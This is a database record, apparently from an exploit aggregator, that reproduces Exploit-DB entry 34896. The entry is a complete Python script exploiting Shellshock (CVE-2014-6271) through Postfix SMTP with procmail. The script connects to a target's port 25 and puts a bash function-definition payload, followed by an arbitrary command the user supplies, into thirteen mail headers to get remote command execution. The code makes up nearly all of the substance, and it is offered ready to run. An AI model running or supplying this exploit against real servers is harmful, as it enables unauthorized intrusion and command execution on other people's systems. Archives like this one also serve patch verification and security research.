{"id": "EDB-ID:34896", "vendorId": null, "type": "exploitdb", "bulletinFamily": "exploit", "title": "Postfix SMTP 4.2.x < 4.2.48 - 'Shellshock' Remote Command Injection", "description": "", "published": "2014-10-06T00:00:00", "modified": "2014-10-06T00:00:00", "cvss": {"score": 0.0, "vector": "NONE"}, "cvss2": {}, "cvss3": {}, "href": "https://www.exploit-db.com/exploits/34896", "reporter": "Phil Blank", "references": [], "cvelist": ["2014-3659", "2014-3671", "2014-6271", "2014-62771", "2014-7169", "2014-7196", "2014-7227", "2014-7910"], "immutableFields": [], "lastseen": "2022-06-20T22:33:10", "viewCount": 14893, "enchantments": {"dependencies": {}, "score": {"value": 6.0, "vector": "NONE"}, "backreferences": {"references": [{"type": "cve", "idList": ["CVE-2014-6271"]}]}, "exploitation": null, "vulnersScore": 6.0}, "_state": {"dependencies": 0}, "_internal": {}, "sourceHref": "https://www.exploit-db.com/download/34896", "sourceData": "#!/bin/python\r\n# Exploit Title: Shellshock SMTP Exploit\r\n# Date: 10/3/2014\r\n# Exploit Author: fattymcwopr\r\n# Vendor Homepage: gnu.org\r\n# Software Link: http://ftp.gnu.org/gnu/bash/\r\n# Version: 4.2.x < 4.2.48\r\n# Tested on: Debian 7 (postfix smtp server w/procmail)\r\n# CVE : 2014-6271\r\n\r\nfrom socket import *\r\nimport sys\r\n\r\ndef usage():\r\n print \"shellshock_smtp.py <target> <command>\"\r\n\r\nargc = len(sys.argv)\r\nif(argc < 3 or argc > 3):\r\n usage()\r\n sys.exit(0)\r\n\r\nrport = 25\r\nrhost = sys.argv[1]\r\ncmd = sys.argv[2]\r\n\r\nheaders = ([\r\n \"To\",\r\n \"References\",\r\n \"Cc\",\r\n \"Bcc\",\r\n \"From\",\r\n \"Subject\",\r\n \"Date\",\r\n \"Message-ID\",\r\n \"Comments\",\r\n \"Keywords\",\r\n \"Resent-Date\",\r\n \"Resent-From\",\r\n \"Resent-Sender\"\r\n ])\r\n\r\ns = socket(AF_INET, SOCK_STREAM)\r\ns.connect((rhost, rport))\r\n\r\n# banner grab\r\ns.recv(2048*4)\r\n\r\ndef netFormat(d):\r\n d += \"\\n\"\r\n return d.encode('hex').decode('hex')\r\n\r\ndata = netFormat(\"mail from:<>\")\r\ns.send(data)\r\ns.recv(2048*4)\r\n\r\ndata = netFormat(\"rcpt to:<nobody>\")\r\ns.send(data)\r\ns.recv(2048*4)\r\n\r\ndata = netFormat(\"data\")\r\ns.send(data)\r\ns.recv(2048*4)\r\n\r\ndata = ''\r\nfor h in headers:\r\n data += netFormat(h + \":() { :; };\" + cmd)\r\n\r\ndata += netFormat(cmd)\r\n\r\n# <CR><LF>.<CR><LF>\r\ndata += \"0d0a2e0d0a\".decode('hex')\r\n\r\ns.send(data)\r\ns.recv(2048*4)\r\n\r\ndata = netFormat(\"quit\")\r\ns.send(data)\r\ns.recv(2048*4)", "osvdbidlist": ["112004"], "exploitType": "remote", "verified": true}
{}
Postfix SMTP 4.2.x < 4.2.48 - 'Shellshock' Remote Command Injection